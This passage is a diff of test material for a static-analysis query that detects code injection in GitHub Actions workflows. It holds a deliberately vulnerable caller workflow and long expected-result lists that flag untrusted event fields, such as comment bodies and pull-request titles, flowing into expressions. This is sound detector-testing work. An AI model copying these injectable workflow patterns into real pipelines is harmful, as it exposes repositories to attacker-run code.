@@ +name: Caller + +on: + issue_comment: + +jobs: + test: + uses: ./.github/workflows/reusable-workflow-2.yml + with: + taint: ${{ github.event.comment.body }} diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.qlref b/ql/test/query-tests/Security/CWE-094/CodeInjection.qlref deleted file mode 100644 index fe9adbf3b64..00000000000 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-094/CodeInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected similarity index 65% rename from ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected rename to ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 848e08cf69e..67c8bbc2b65 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -9,8 +9,6 @@ edges | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | -| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | -| .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | @@ -46,6 +44,8 @@ edges | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | +| .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | +| .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | @@ -77,6 +77,10 @@ edges | .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | nodes +| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | @@ -93,10 +97,6 @@ nodes | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | semmle.label | steps.changed-files3.outputs.all_changed_files | | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | semmle.label | Uses Step: changed-files5 | | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | semmle.label | steps.changed-files5.outputs.all_changed_files | -| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | -| .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | @@ -201,6 +201,10 @@ nodes | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | +| .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | @@ -229,7 +233,6 @@ nodes | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | semmle.label | toJSON(github.event.comment) | | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | -| .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | semmle.label | toJSON(github) | | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | semmle.label | toJSON(github.event) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | @@ -256,100 +259,80 @@ nodes | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | subpaths #select -| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | -| .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | -| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | -| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | -| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | -| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} | -| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | -| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | -| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | -| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | -| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | -| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | -| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | -| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | -| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | -| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | -| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | -| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | -| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | -| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | -| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. | 